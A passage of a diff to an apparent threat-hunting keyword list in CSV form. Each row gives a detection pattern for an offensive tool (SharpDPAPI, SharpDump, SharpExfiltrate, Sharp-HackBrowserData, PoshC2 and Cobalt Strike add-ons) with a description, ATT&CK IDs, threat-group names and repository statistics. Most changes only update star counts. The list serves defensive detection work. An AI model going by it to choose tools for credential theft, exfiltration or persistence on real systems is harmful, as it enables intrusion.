credentias 
*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" 
"*SharpDPAPIMachine*.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpDXWebcam*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" -"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpEfsPotato by @bugch3ck*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.cs*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.exe*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.sln*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" 
"*SharpEfsPotato-master*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsTriggeEfs.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpEventLoader*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEvtMute.cs*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" 
@@ -16593,7 +16776,7 @@ "*SharpEvtMute.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpExcelibur*","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","85","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z" "*sharp-exec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpExfiltrate.csproj*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*SharpExfiltrate.sln*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" 
@@ -16608,101 +16791,101 @@ "*SharpGmailC2-main*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" -"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpGPOAddComputer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddLocalAdmin*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddUser*Manager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Sharp-HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" -"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation 
